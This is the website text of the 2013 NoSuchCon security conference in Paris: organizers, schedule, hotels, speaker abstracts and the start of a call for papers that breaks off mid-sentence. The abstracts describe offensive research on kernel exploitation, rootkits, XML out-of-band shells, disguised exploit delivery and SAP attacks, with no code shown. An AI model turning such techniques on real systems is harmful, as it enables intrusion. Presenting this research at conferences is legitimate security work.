"Each time I step into this kind of conference, I am impressed with the amazing amount of skills they gather. And if I do the math, multiplying this skills by the fourty-plus years of activity ahead of these young researchers, engineers, PhDs, I realize that the future of our society is precisely here. This is the new elite of this country as well as of the world for this conference has a worldwide scope. The Ivy League and the Grandes Ecoles, so typical of the French system are already dead as a doornail, they just haven’t realized it yet."
Laurent Bloch, Security Expert & Senior Writer
FOR ANY QUESTION ABOUT THE EVENT firstname.lastname@example.org
TO BE SPONSORS email@example.com
TO SUBMIT YOUR TALK firstname.lastname@example.org
FOR ANY QUESTION ABOUT PRESS AND MEDIA PARTNERS email@example.com
FOR ANY QUESTION ABOUT THE WEBSITE firstname.lastname@example.org
HIPOTEL PARIS BELLEVILLE
21 Rue Vicq d’Azir,
75010 Paris, France
+33 1 42 08 06 70
12 Rue Louis Blanc,
75010 Paris, France
+33 1 42 08 21 40 (fax)
LIBERTEL CANAL SAINT MARTIN
5 Avenue Secrétan,
75019 Paris, France
+33 1 42 06 62 00
BUTTES CHAUMONT HOTEL PARIS
4 Avenue Secrétan,
75019 Paris, France
+33 1 42 45 33 81
232 Rue du Faubourg Saint-Martin,
75010 Paris, France
+33 1 40 34 38 50 (Fax)
PEACE & LOVE
245 Rue la Fayette,
75010 Paris, France
+33 1 46 07 65 11
124 Avenue Simón Bolívar,
75019 Paris, France
+33 1 42 08 31 17
HOTEL DE LA COMETE
196 Boulevard de la Villette,
75019 Paris, France
+33 1 42 08 55 88
NoSuchCon is a three-days-long conference set up by volunteer members
through a non-profit organization.
The project is the offspring of well-known people of the cybercommunity, people used to international IT security conferences and, up-until-then, of organizers of Hackito Ergo Sum. Each member of the organization is, in a variety of projects, part of the international cybercommunity. The organizing team is moved by the ambition of gathering the best researchers in ethical hacking and IT security, of sharing innovation, inform and transmit knowledge with the final goal of stepping up the technical level of the community.
NoSuchCon presents new and exclusive contents regarding IT security. The conference is a crucible for different IT security flavours : professionals, enthousiasts, hackers ; renoun or more secretive. Conferences allow to share best practices, let new tendencies and exclusive research appear, in such a way as to allow anticipating the challenges to come.
NoSuchCon is a place for both well-known, top-guns of the cybercommunity, as well as young researchers at the dawn of their career or others presenting their results anonymously. NoSuchCon has multiple goals but it more importantly wants to foster exchange, federating different communities: students, key actors of the industry, private and public sectors. It wants to make room for practical demonstrations as well as innovative theoretical findings.
The 2012 edition we organized in the Espace Niemeyer last April under the name Hackito Ergo Sum gathered 56 international speakers constituted a topnotch roster allowing for an exceptional world-class event.
Among the themes of interest : vulnerabilities assessments and analysis, SCADA architectures, reverse engineering, attacks on the Banking and Telecom infrastructures, Cloud computing security, botnets, Threat Intelligence, etc. The program committee comprizes among the best hackers and security researchers worldwide, both theoretician and practitioners, which is a key factor to guarantee the quality of content. It will be uniquely diverse in its international composition. Bridging over frontiers and sovereignty issues, ideological and economical differences, the program committee looks for people able to share their research findings and propose new concepts.
Organizers and staff :
Cedric Blancher (Sid)
Researcher, serial-speaker, snowboarder and skydiver
Jonathan Brossard (Endrazine)
Elite computer terrorist. Old school reverse engineer. Speaker at Blackhat/CCC/Defcon.
Arnaud Malard (Sud0man)
Pentester, researcher (when I have time), skier, snowboarder and father of 2 tiny hackers.
Nicolas Ruff (Newsoft)
Security researcher, hacker, blogger, serial speaker, troll herder, happy father, and more ...
Joffrey Czarny (Sn0rky)
Security researcher, VoIP hacker, Ambassador of Happiness and Healthy Living
Relationista behind the scenes, involved in some hackers communities around the planet with an historic focus on open source and security areas.
CISO, pentester, speaker at BlackHat (long ago) and al
The flying security guy
Assistant deputy director, Propaganda Department (Propdep) -- Ministry of Truth, Bullshistan.
Graphic Design :
Valérie Micaux (athoms)
Graphic designer at home, happy girl and snowboarder
Pentester and more ...
Steven (OvertheWire), Eloi Vanderbéken
9h - 10h15
10h15 - 11h15
11h15 - 12h00
Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions
Mateusz "j00ru" Jurczyk
12h - 14h
14h - 14h45
Ninjas and Harry Potter: "Spell"unking in Apple SMC Land
14h45 - 15h30
15h30 - 16h
16h - 16h45
Dumb fuzzing XSLT engines in a smart way
16h45 - 17h30
Deadly Pixels - Innovative (and pretty) exploit delivery
17h30 - 18h15
Pythonect-Fu: From Function to Language
9h - 10h
10h - 10h30
10h30 - 11h15
John Butterworth, Corey Kallenberg, Xeno Kovah
11h15 - 12h
Who'd have thought they'd meet in the middle? 'ARM Exploitation' meets "Hardware Exploitation". Sharable memoirs from a very surprising last year
Stephen A. Ridley
12h - 14h
14h - 14h45
Advanced Heap Manipulation in Windows 8
14h45 - 15h30
A hesitation step into the blackbox : Heuristic based Web-Application Reverse-engineering
Fabien Duchene, Sanjay Rawat, Jean-Luc Richier, Roland Groz
15h30 - 16h
16h - 16h45
Corroding immobilizer cryptography
16h45 - 17h30
Taint Nobody Got Time for Crash Analysis
Richard Johnson & pa_kt
17h30 - 18h15
Transporting evil code into the Business: Attacks on SAP TMS
19h - 2h
"The Party" (La Rotonde) - Metro 2, 5 or 7 Stalingrad
9h - 10h
10h - 10h30
10h30 - 11h15
Crashdmp-ster Diving the Windows 8 Crash Dump Stack
11h15 - 12h
Exploiting Hardcore Pool Corruptions in Microsoft Windows Kernel
12h - 14h
14h - 14h15
14h15 - 15h
XML Out-Of-Band Exploitation
Yunusov Timur, Alexey Osipov
15h - 15h45
Revisiting Mac OS X Kernel Rootkits
Pedro Vilaca aka fG!
15h45 - 16h15
16h - 16h45
Exploiting Game Engines For Fun And Profit
Donato Ferrante & Luigi Auriemma
16h45 - 17h45
Any Input is a Program
17h45 - 18h45
Killing RATs, the Arsenic Framework
Robinson Delaugerre & Adrien Chevalier
Andrea Barisani - Keynote Speaker
Andrea Barisani is an internationally known security researcher. Since owning his first Commodore-64 he has never stopped studying new technologies, developing unconventional attack vectors and exploring what makes things tick...and break.
His experiences focus on large-scale infrastructure administration and defense, forensic analysis, penetration testing and software development, with more than 13 years of professional experience in security consulting.
Being an active member of the international Open Source and security community he contributed to several projects, books and open standards. He is now the founder and coordinator of the oCERT effort, the Open Source Computer Security Incident Response Team.
He has been a speaker and trainer at BlackHat, CanSecWest, DEFCON, Hack In The Box, PacSec conferences among many others, speaking about TEMPEST attacks, SatNav hacking, 0-days, OS hardening and many other topics.
Dmitri Alperovitch - Keynote Speaker
Dmitri Alperovitch is the Co-Founder and CTO of CrowdStrike Inc., leading its Intelligence, Research and Engineering teams. Arenowned computer security researcher, he is a thought-leader on cybersecurity policies and state tradecraft. Prior to founding CrowdStrike, Dmitri was a Vice President of Threat Research at McAfee, where he led company’s global Internet threat intelligence analysis.
With more than a decade of experience in the field of information security, Alperovitch is an inventor of ten patented and sixteen patent-pending technologies and has conducted extensive research on reputation systems, spam detection, web security, public-key and identity-based cryptography, malware and intrusion detection and prevention.
Thomas Lim - Keynote Speaker
Thomas Lim is the Founder and CEO of COSEINC and SyScan. Previously as the head of IT Security in one of the largest IT services companies in Singapore, he was highly disappointed with the so-called Security seminars organised by the various vendors to be nothing but a sales and marketing pitch.
In 2004, he founded SyScan, a true-blue technical-based and vendor neutral IT security conference with a strong emphasis on cutting edge security research. Today, in its 8th year, SyScan is one of the most recognised security conference in the security community.
As for COSEINC, this is the only privately based and funded security research company in Singapore, which became highly prominent in the security community after the publication of "BluePill" - the first hardware based VM rootkit back in 2006.
Alex Ionescu - Ninjas and Harry Potter: "Spell"unking in Apple SMC Land
It stores your File Vault (Full Volume Encryption) Password. It has a "Ninja Action Timer". It has secret "keys" that you must enable using actual spells from the Harry Potter book series. Other than full ACPI/LPC/I2C access, it has access to your battery, your fans, your thermal sensors, and your voltage regulators and can pretty much be rigged to fry them. It reacts to you sticking your palm in front of the lid, and knows when you've dropped your laptop and it's about to hit the floor. But the best part? There's no way to read its code without invasive hardware/JTAG/IDP access... while anyone can flash it behind your back. Welcome, to the world of the Apple System Management Controller.
If you think 64-bit fancy EFI bootkit persistence is awesome (thanks, Snare!), join this talk a look at 8-bit raw SMC chipkit persistence, and other low-level mysteries.
Finally, we'll also take a look at all sorts of fun that an unprivileged user can have through the AppleSMC kernel extension.
Alex Ionescu is the Chief Architect at CrowdStrike, Inc. Alex is a world-class security architect and consultant expert in low-level system software, kernel development, security training, and reverse engineering. He is coauthor of the last two editions of the Windows Internals series, along with Mark Russinovich and David Solomon. His work has led to the fixing of many critical kernel vulnerabilities, as well as to over a few dozen non-security bugs.
Previously, Alex was the lead kernel developer for ReactOS, an open source Windows clone written from scratch, for which he wrote most of the Windows NT–based subsystems. During his studies in Computer Science, Alex worked at Apple on the iOS kernel, boot loader, and drivers on the original core platform team behind the iPhone, iPad and AppleTV.
Zhenhua(Eric) Liu - Advanced Heap Manipulation in Windows 8
With the introduction of Windows 8, previously publicly known heap/kernel pool overflow exploitation techniques are dead because of exploit mitigation improvements. There are indications that compromising application speciﬁc data, which is facilitated by heap manipulation, is becoming more popular for future exploitation.
How to deterministically predict the heap state in great possible level?
The tradition manipulation technique (both kernel pool and user heap) is to consistently defragment the heap which makes future allocations adjacent afterward, and then make holes in these allocations to let the vulnerable buffer, which with similar size, fall into one of them.
In the user heap a new LFH allocator was introduced, the randomized alloc/free and guard pages made this technique tough to work.
Beyond that, the traditional technique has some limitations such as the size of the vulnerable buffer and the type of data structure that could be chosen as attacking target (especially in kernel pool), which together make it can no longer be considered a generic solution.
This talk is aimed at providing an advanced method on how to precisely manipulate heap layouts (kernel pool and user heap) by standing on the giant’s shoulder: “Heap Feng Shui”.
Zhenhua(Eric) Liu is a Security Researcher at Fortinet (Canada) Inc. He mainly focuses on vulnerability exploitation and discovery, deep digging into security features and mitigations of OS.
He currently lives in Vancouver. He spends his free time hiking, scuba diving and playing baseball. He is also a great fan of Rock music.
Donato Ferrante & Luigi Auriemma - Exploiting Game Engines For Fun And Profit
Games are very interesting from a security perspective, with an insane amount of players playing online games and companies pushing out new games at an incredible rate. This talk will focus on the security of the game engines. Since multiple games usually share the same engine, finding vulnerabilities in game engines turns to be a really attractive work. The talk will cover aspects of game engines, ranging from network to game protocols, from a bug hunter's point of view. The speakers will present some new 0-day vulnerabilities affecting a well known game engine.
Donato: Co-Founder and Security Researcher at ReVuln Ltd. Prior to founding ReVuln Ltd., Donato was a Security Researcher for Research In Motion (Blackberry), where his daily job was performing security research and vulnerability assessments of RIM authored code, products and services including infrastructure, devices, and QNX operating system. Donato found several vulnerabilities in well known commercial products and open source software and his first public disclosed security advisory was released in 2003.
Luigi Auriema: Co-Founder and Security Researcher at ReVuln Ltd. Luigi has been in the security field for more than a decade, as an Independent Security Researcher (aluigi.org) he is a world recognized expert in this field and discovered more than 2000 vulnerabilities in widely used software. The following are some key points of Luigi's work. Highest number of security vulnerabilities disclosed in SCADA/HMI software. TV vulnerabilities. Multiplayer games security. Currently the most prolific vulnerability researcher for total number of security bugs found in any software.
John Butterworth, Corey Kallenberg, Xeno Kovah - BIOS Chronomancy
In 2011 the National Institute of Standard and Technology (NIST) released a draft of special publication 800-155. This document provides a more detailed description than the Trusted Platform Module (TPM) PC client specification for content that should be measured in the BIOS to provide an adequate Static Root of Trust for Measurement (SRTM). To justify the importance of 800-155, in this talk we look at the implementation of the SRTM from a vendor's pre-800-155 laptop. We discuss how the BIOS and thus SRTM can be manipulated due to a configuration error.
We also show how a 51 byte patch to the SRTM can cause it to provide a forged measurement to the TPM indicating that the BIOS is pristine. If a TPM Quote is used to query the boot state of the system, this TPM-signed falsification will then serve as the root of misplaced trust. We also show how reflashing the BIOS may not necessarily remove this trust-subverting malware. To fix the un-trustworthy SRTM we apply an academic technique whereby the BIOS software indicates its integrity through a timing side-channel.
John Butterworth is a security researcher at The MITRE Corporation. John specializes in low-level system security and development. John's current focus is on BIOS/UEFI security.
Corey Kallenberg is a security researcher currently employed by The MITRE Corporation. Corey specializes in low level system development, vulnerability discovery and exploitation, and rootkit analysis. Corey's current focus is on BIOS/UEFI security.
Xeno Kovah is a security researcher currently employed by The MITRE Corporation. Xeno specializes in Windows kernel development, reverse engineering and malware analysis. Xeno is the founder of opensecuritytraining.info, a website that offers free security training.
Stephen A. Ridley - Who'd have thought they'd meet in the middle? 'ARM Exploitation' meets "Hardware Exploitation". Sharable memoirs from a very surprising last year
In this talk (which in part was delivered at Breakpoint 2012 and Infiltrate 2013) we will discuss our recent research that is being rolled into our Practical ARM Exploitation course on Linux and Android (for embedded applications and mobile devices). We will also demonstrate these techniques and discuss how we were able to discover them using several ARM hardware development platforms that we custom built.
Lastly, we will also discuss some of our most recent related hardware research (to facilitate the above) which will include bus protocol eavesdropping/reverse engineering, demystifying hardware debugging, and surreptitiously obtaining embedded software (firmware) using hardware techniques. We will demonstrate and show the supportive tools used and techniques developed to perform this work and deploy them against Apple MFI iAP devices, and multimedia devices using OEM implemented USB stacks. Along the way we will inevitably share some of the lessons we also learned while completely designing the hardware (from scratch(, writing the firmware, (and mobile apps for) an embedded security device we hold the patent for and will be publicly releasing within the next month.
Stephen A. Ridley is a security researcher with more than 10 years of experience in software development, software security, and reverse engineering. Currently at Accipiter Research, Mr. Ridley oversees a small security research team in addition to leading product development for Accipiter's embedded security devices (due for public release in Q2 2013). Before his work at Accipiter, Mr. Ridley served as the Chief Information Security Officer of a financial services firm. Prior to that: Senior Researcher at Matasano, a Manhattan based security research and development firm. He also was Senior Security Architect at McAfee, and a founding member of the Security and Mission Assurance (SMA) group at a major U.S defense contractor where he did vulnerability research and reverse engineering in support of the U.S. Defense and Intelligence community.
Mr. Ridley has spoken at and performed trainings at industry conferences such as: BlackHat, ReCon,EuSecWest, CanSecWest, Syscan, Breakpoint, Infiltrate and others.) Mr. Ridley is the author of a few upcoming books one of which is "Android Hackers Handbook" to be published by Wiley and Sons.
Mateusz "j00ru" Jurczyk - Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions
The Microsoft Windows NT-family operating systems have gone a long journey throughout the last two decades - from an unstable and extremely insecure environment to a relatively secure system, incorporating numerous effective exploit mitigations against both local and remote attacks. While many would agree that identifying and taking advantage of Local Elevation of Privileges vulnerabilities has since became a more difficult task and now requires specialist knowledge, the presentation will discuss how some of the most core kernel components can be still considered extremely fragile and even useful in practical local attacks, including breaches of widely deployed sandboxing technologies. We will focus on non-trivial quirks, exploitation of certain scenarios and amusing bugs or behaviors that have made it to Windows NT 3.1 and remained unnoticed until Windows 7 or 8, likely with some low- to medium-severity 0-day security flaws mixed in.
Mateusz is a big fan of memory corruption. His main areas of interest are client software security, vulnerability exploitation and mitigation techniques, and delving into the darkest corners of low-level kernel internals with a very strong emphasis on Microsoft Windows. He is currently working as an Information Security Engineer at Google.
Richard Johnson & pa_kt - Taint Nobody Got Time for Crash Analysis
The last decade has seen a large focus on vulnerability discovery automation with various methods of fuzzing and input generation, however little has been said about crash analysis or triage. This talk will discuss a powerful toolchain for crash analysis that incorporates the best available approaches for automated reasoning about memory access violation exceptions and overcomes limitations in currently available tools such as !exploitable and crashwrangler.
In particular, we will discuss three key areas: dynamic taint analysis to track areas of memory that are influenced by user-controlled data, forward and backward taint slicing to isolate input bytes that lead to the crashing state, and finally forward symbolic execution to determine if the input can be modified to reach an alternate state giving more control over the execution of the program. In other words, our system will isolate the input bytes causing the crash and try to determine if your ReadAV can actually be turned into a WriteAV or code execution.
This toolchain is designed to plug into a standard fuzzing system to help complete the automation loop for vulnerability discovery and triage. We also include a GUI component for utilizing the data within IDA Pro. This project will be freely available to the public during the summer of 2013. The core concepts can also be adapted for use in malware analysis and vulnerability discovery.
Richard Johnson is a computer security specialist who spends his time playing in the realm of software vulnerability analysis. Richard currently fills the role of Principal Research Engineer on Sourcefire's Vulnerability Research Team, offering over 10 years of expertise in the software security industry. Current responsibilities include research on exploitation technologies and automation of the vulnerability triage and discovery process. Past areas of research include memory management hardening, compiler mitigations, disassembler and debugger design, and software visualization. Richard has released public code for binary integrity monitoring, program debugging, and reverse engineering and has presented at dozens of conferences worldwide since 2004. Richard is also a co- founder of the Uninformed Journal and a long time resident of the Hick.org ranch.
pa_kt is a Senior Research Engineer on Sourcefire's Vulnerability Research team. 10+ years of experience in reverse engineering in various roles (like malware analyst or vulnerability researcher) and MSc in computer science help him to fullfil his current responsibilities at Sourcefire, which include (but are not limited to) automating various stages of vulnerability discovery and triage.
Nikita Tarakanov - Exploiting Hardcore Pool Corruptions in Microsoft Windows Kernel
Each new version of Windows OS Microsoft enhances security by adding security mitigation mechanisms ? Kernel land vulnerabilities are getting more and more valuable these days. For example, the easy way to escape from a sandbox (Google Chrome sandbox for example) is by using a kernel vulnerability. That?s why Microsoft struggles to enhance security of Windows kernel.
Kernel Pool allocator plays significant role in security of whole kernel. Since Windows 7, Microsoft started to enhance the security of the Windows kernel pool allocator. Tarjei Mandt aka @kernelpool has done a great job in analyzing the internals of the Windows kernel pool allocator and found some great attack techniques, mitigations bypasses etc. In Windows 8 however, Microsoft has eliminated almost all reliable techniques of exploiting kernel pool corruptions. An attack technique by Tarjei needs a lot of prerequisites to be successful and there are a lot of types of pool corruptions where his techniques don?t work unfortunately.
What if there is no control over overflown data? What if there is constant (zero bytes) and you have no chance to apply one of Tarjei?s techniques? What if there is uncontrolled continuous overflow and #PF and BSOD is unavoidable?
So what to do? Commit suicide instantly? NO! Come and see this talk! We present a technique of 100% reliable exploitation of kernel pool corruptions which covers all flavors of Windows from NT 4.0 to Windows 8.
Nikita Tarakanov is an independent information security researcher who has worked as an IS researcher in Positive Technologies, VUPEN Security and CISS. He likes writing exploits, especially for Windows NT Kernel and won the PHDays Hack2Own contest in 2011 and 2012. He also tried to hack Google Chrome during Pwnium 2 at HITB2012KUL but failed. He has published a few papers about kernel mode drivers and their exploitation and is currently engaged in reverse engineering research and vulnerability search automation.
Saumil Shah - Deadly Pixels - Innovative (and pretty) exploit delivery
What do you get if you combine art with an exploit? "Deadly Pixels" is the fine art (pun intended) of packaging exploits. The result is a pretty picture with not-so-pretty after effects. This is not another talk about packers and crypters when it comes to exploit delivery. We are talking eye candy, visual appeal, style! A successful exploit is one that is delivered with style. This talk explores several sneaky, funny, silly and creative techniques for delivering exploits right to your doorstep with zero interference from content-filtering or anti-virus.
Demos, demos everywhere. Seeing is believing, and this talk is all about pretty pictures anyway.
Thought provoking discussions on newer and more innovative ways of disguising and delivering exploits. The future of browsers. The future of web content. Futility of signature based blacklisting. For the attacker it is all about how to get really sneaky. For the defender it is all about turning what is theoretical into practical reality.
Precursors to these technique had been presented at Hack in the Box Kuala Lumpur 2012 and DeepSec 2012. Since then, there have been two more techniques added, two entirely new toolkits built up. I'm open sourcing them too. The previous presentations were based on early experimentation. Since then I have received a lot of feedback and inputs and shall be applying it all in this presentation.
Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients around the globe. Saumil is an internationally recognized speaker and instructor, having regularly presented at awesome conferences like Deepsec, Blackhat, RSA, CanSecWest, PacSec, EUSecWest, Hack.lu, Hack-in-the-box and others. He has authored two books titled "Web Hacking: Attacks and Defense" and "The Anti-Virus Book".
Saumil graduated with an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time breaking software, flying kites, traveling around the world and taking pictures.
Pedro Vilaca aka fG! - Revisiting Mac OS X Kernel Rootkits
This presentation is about old school kernel extension rootkits in Mac OS X. The main motivation behind it is that there are no up-to-date state of the art rootkits for OS X! Well, Dino talked about a VT-X one but that code never became public. What we have these days is really lame commercial spyware being sold to govs and other shady entities for 200k. They are shameful to the great art of writing rootkits! Everything else (public) is too old and not fun anymore. Even the recently released Rubilyn doesn't work in Mountain Lion and it is too simplistic on its approach. All this kind of sucks because OS X kernel is an interesting place and needs some rootkit love.
The whole research and its results are based on two very simple ideas that open the door to many new possibilities to take control and hack the OS X kernel via kernel extensions (or IOKit drivers). Simple things usually work better!
An Economist with an evil mind (certified by a MBA) and a knack for IT. I really hate this third person thing :-) Call it ego integer overflow!
Karsten Nohl - Corroding immobilizer cryptography
Immobilizers have for a long time increased the difficulty of stealing cars. Older immobilizer transponders defeated thieves by requiring non-trivial RF skills for copying keys. Current transponders go one step further by employing cryptographic functions with the potential of making car cloning as difficult as breaking long-standing mathematical problems. Cryptography, however, is only as strong as the weakest link of key management, cipher strength, and protocol security. This talk discusses weak links of the main immobilizer technologies and their evolution over time.
Karsten Nohl is a cryptographer and security researcher. He likes to test security assumptions in proprietary systems and typically breaks them.
Nicolas Gregoire - Dumb fuzzing XSLT engines in a smart way
In 2012, I decided to fuzz every well-known C-based XSLT engines. Not having the horsepower of Google, I chose to fuzz the XSLT engines themselves and not the applications using them. This leads to funny situations like finding bugs impacting Adobe Reader while testing an old open-source library instrumented with AddressSanitizer. Vulnerabilities in Chrome, Adobe Reader, Microsoft IE, Oracle DB, ... were found.
Nicolas Gregoire has more than 12 years of experience in penetration testing and auditing of networks and (mostly Web) applications. He founded Agarri, a small company where he finds security bugs for customers and for fun. His research was presented at numerous conferences around the world (Hack in the Box, HackInParis, ZeroNights, ...) and he was publicly thanked by some well known vendors (Microsoft, Adobe, Mozilla, Google, Apple, VMware, ...) for responsibly disclosing vulnerabilities in their products.
Sergey Bratus - Any Input is a Program
Sergey Bratus is a Research Assistant Professor of Computer Science at Dartmouth College. He tries to help fellow academics to understand the value and relevance of hacker research. It is his ambition to collect and classify all kinds of weird machines; he is also a member of the http://langsec.org conspiracy to eliminate large classes of bugs.
Aaron LeMasters - Crashdmp-ster Diving the Windows 8 Crash Dump Stack
The Microsoft Windows crash dump mechanism is perhaps one of the most crucial undocumented components to have survived the scrupulous eyes of reverse engineers and Windows internals experts for so long. Tucked away discreetly in the bowels of the operating system, the undocumented crash dump stack provides the operating system a powerful, fast and independent I/O path to the boot device used for various internal purposes (crash dump file generation, hibernation, and fast boot in Windows 8). Microsoft has provided some sparse and vague documentation for selective aspects of the crash dump stack, but only enough to expose the absolute minimum knowledge necessary for kernel driver developers to integrate their software. Past research has revealed that the crash dump driver stack can be manipulated using various bypass techniques to read and write to a mass storage device outside normal operating system use. While past research focused on advanced techniques to manipulate the lowest-level disk drivers in the crash dump driver stack (the dump port and miniport drivers) to use the crash I/O path outside its intended environment, this paper explores the secrets of the crashdmp.sys driver, a component introduced in Windows Vista to house crash dump stack related code formerly in the kernel. In contrast to prior research, this paper studies the relationship between crashdmp.sys and crash filter drivers and presents a new technique to use the crash I/O path when the stack is in use during a system crash or hibernation by leveraging new crash dump logging features introduced in Windows 8.
Aaron LeMasters is a Senior Security Researcher at CrowdStrike. He is currently contributing to the development of the company's flagship product and related research tasks. Prior to joining CrowdStrike, Aaron was a researcher/developer at Mandiant, where his primary roles involved writing code for the company's product and designing countermeasures for advanced rootkits through reverse engineering.
Aaron is a co-author of Hacking Exposed: Malware and Rootkits, (October 2009, McGraw-Hill). He earned a Master of Science, Computer Science and Information Assurance, from The George Washington University, and a Bachelor of Science in Computer Science from Mississippi State University.
Aaron has blogged regularly at past jobs on various technical topics and has spoken at a number of Information Security industry conferences such as Blackhat USA and Syscan. His most recent personal research project is http://crashd.mp, a website dedicated to cataloging information about the Windows crash dump mechanism.
Yunusov Timur, Alexey Osipov - XML Out-Of-Band Exploitation
Proposed approach gives possibility to attack internal networks, when no direct connection from attacker to vulnerable XML parser exist. Moreover, client applications (as well as server-side services) are also subject for this vulnerability. Victim's XML parser opening susceptible file will enable remote attacker to create interactive shell in which he can read victim's local files. Techniques involve not only DTD/entity based techniques, but also covers different extensions of XML (like XSLT, XPath, XInclude) *Presentation will be oriented more on practical demonstration of exploitation such techniques. It will be shown that different products from different wide-spread vendors are affected. And special mention to security tools (TrustWave ModSecurity) and different IDE's (SIEMENS ICS products, MS Visio, MS Visual Studio)
Timur Yunusov, Web Application Security Researcher. Author of multiple researches in field of Web application security (including "Bruteforce of PHPSESSID", rated in Top Ten Web Hacking Techniques of 2012 by WhiteHat Security). Professional pentester of web applications.
ScadaStrangeLove team member
Alexex Osipov, Security tools and PoC developer.
DEFCON Russia speaker
Bugbounty programs active participant
Professional pentester of web applications
ScadaStrangeLove team member
Juan Perez-Etchegoyen - Transporting evil code into the Business: Attacks on SAP TMS
The largest organizations of the world run their businesses on top of SAP applications. SAP platforms are shipped with several thousands (!) standard programs, but customers still need to do their own customizations and therefore, they develop their own code and create their own objects. In order to ensure a rigorous Change Management process, several layers must be defined and connected: the "Environments". All changes and customizations to these critical applications are configured, developed and tested first, to be then finally "transported" to the Production environment where employees actually use them to perform the Company's business processes.
These different environments are connected and configured through the SAP Transport Management System (TMS). This proprietary component is present in all SAP implementations in the world. However, if the TMS is not secured (it is not by default), then a wide range of attacks can be performed, which would result in a complete compromise of the Business.
Join us in this brand-new presentation. Through several live demonstrations, you will learn how an attacker can break proprietary protocols, de-construct obscure file formats and inject rootkits that could result in silent espionage, sabotage and fraud attacks. Finally, you will learn how it is possible to protect your own platform from these attacks.
Juan Pablo is the CTO of Onapsis, leading the Research and Development teams that keep the Company in the cutting-edge of the ERP security field. Juan Pablo is fully involved in the design, research and development of the innovative Onapsis' software solutions. Being responsible for managing the Onapsis Research Labs, Juan Pablo has also been actively involved in the coordination and research of critical security vulnerabilities in ERP applications and business-critical infrastructure, such as SAP, Oracle and JD Edwards. Juan Pablo has an extensive experience in the information security field, being involved in large research, penetration testing, vulnerability assessment and security implementations projects, among other kind.
As a result of his innovative research work, Juan Pablo has been invited to lecture trainings and presentations in some of the most renowned security conferences of the world, such as BlackHat, HITB and Ekoparty, as well as to host private trainings on different aspects of information security for Global Fortune-100 organizations.
Fabien Duchene, Sanjay Rawat, Jean-Luc Richier, Roland Groz - A hesitation step into the blackbox : Heuristic based Web-Application Reverse-engineering
Automated black-box scanners alternatively reverse-engineer and fuzz web applications to detect vulnerabilities. It is established that the knowledge they acquired about such applications plays a key role in their ability to exhibit vulnerabilities. In this paper we adapt a method to automatically reverse-engineer web applications. Three heuristics drive this process. Empirical experiments show that our method obtains a more precise knowledge of the application than state-of-the-art tools, and also increasing vulnerability detection capability.
Fabien Duchene is a PhD student at LIG Lab, University of Grenoble, France. His current research focuses on evolutionary fuzzing to improve vulnerabilities detection in blackbox (not greybox!) harnessing. He created the GreHack hardcore security conference. Previously, he worked at Microsoft, and, later on, at Sogeti-ESEC. He holds an MSc in Computer Science from the "Grande Ecole" Ensimag, France.
Itzik Kotler - Pythonect-Fu: From Function to Language
Domain-specific language (DSL) is a computer language that targets a particular kind of problem, rather than a general purpose language that aims at any kind of software problem. The main benefit of DSL is that it lets you focus on the business problem, rather than on the details of the programming platform. Many security domains such as malware analysis, penetration testing, and forensics could benefit from a DSL that would provide a quicker prototyping and testing. So how difficult is it to develop a Domain-specific language? Piece of cake. Meet Pythonect, a new, free and open source dataflow programming language that lets you take your favorite already-existing Python functions and turn them into a DSL. This talk will introduce Pythonect, its features, its DSL capabilities, and a couple of security-oriented DSLs written in Pythonect.
Itzik Kotler has been doing Information Security for well over 12 years and is currently an independent consultant. Before that, he was the Chief Technology Officer at Security Art. Previously, Itzik was the Security Operation Center Team Leader at Radware and the Lead Security Researcher at Safend. Itzik speaks regularly at Blackhat, DefCon, Hack In The Box and other conferences. Additionally, he founded and organizes the Tel-Aviv DefCon (DC9723) meetup group, and is a member of the Standards Institution of Israel (SII) Committee on Information Security.
Robinson Delaugerre & Adrien Chevalier - Killing RATs, the Arsenic Framework
With all this talk about APTs and Little Chinese Hackers All Up In your Network, we aim to bring a little sanity into the what the public believes is the Incident Response world. With the Arsenic Framework, we bring together Reverse Engineering, Network Analysis and Host Analysis to give people the power to investigate their own network. In this talk, we'll demonstrate the effectiveness of our toolchain on the activity of an Old RAT (Poison Ivy) as captured in an enterprise network, from network detection to complete removal, and even going all Hacking back with a way to exploit some known vulnerabilities on the C2 server. By releasing this framework, we aim to do the heavy lifting for incident responders, and provide them with a collaborative workspace where every specialist can do its share, giving network admins the way to fight effectively against known RATs, and encouraging the collaboration amongst security experts to finally provide an effective defense against tools used by APT actors.
Robinson was raised by wolves and only got his hand on a computer when he was 19. By then, he singlehandedly defeated an army of armenian hackers who tried to get all of his bases. He had a particular set of skill that came in handy. Having found his vocation, he started working in IT Security, and has been doing so for a little less than five years, bringing together his passion for jerking off in front of a screen and telling people what to do. He's currently an evangelist on Twitter, and not a bitch at what he does for a living.
Adrien learned to read in binary, and by the age of twelve, he knew how to write JMPs in assembler, but not how to communicate with people who didn't use PEP8. He was an unpaid worker for the ministry of defense, and is now France's biggest buyer of bleach, to be applied directed to the eyes, daily. He lately found sanity in a job where you don't sleep, or eat, or get paid, unless you own some boxes. Needless to say he sleeps a lot, and lost a whole bunch of money when Greece defaulted. Since then, he uses lent as an excuse to not eat döners.
******************************************************************************* PARENTAL ADVISORY: 100% technical content ******************************************************************************* _______ _________ .__ _________ \ \ ____ / _____/__ __ ____ | |__ \_ ___ \ ____ ____ / | \ / _ \ \_____ \| | \_/ __\| | \ / \ \/ / _ \ / \ / | ( (_) ) / \ | /\ (___| Y \ \ \___( (_) ) | \ \____|__ /\____/ /_______ /____/ \___ >___| / \______ /\____/|___| / \/ \/ \/ \/ \/ \/ 2013 _________ ___________ __________ \_ ___ \ \_ _____/ \______ \ / \ \/ | __) | ___/ \ \____ | \ | | \______ / \___ / |____| \/ \/ +--------------------------------------------------------------+ = = = NoSuchCon - CFP 2.0 = = = = ** http://nosuchcon.org ** = = = = 15-17 May 2013 / Paris / France = = = °--------------------------------------------------------------° -- + -- The US have the NSA, hackers have the NSC. --[ Synopsis: The first edition of the NoSuchCon conference will take place in Paris from May the 15th to May the 17th of 2013. NSC is the badass hardcore technical security conference. Of death. --[ Background: We think hacking is a science, not an art. It's largely the science of experimentation and self learning. Best effort is not enough anymore. The number of hackers reaching the level where they can actually discover things by themselves has never been so high. And at the same time, the signal-to-noise ratio in our traditional communication channels (IRC, mailing lists, conferences, informal gatherings...) has never been so low. So we though we might give it a shot: we're trying to build a 0% bullsh!t 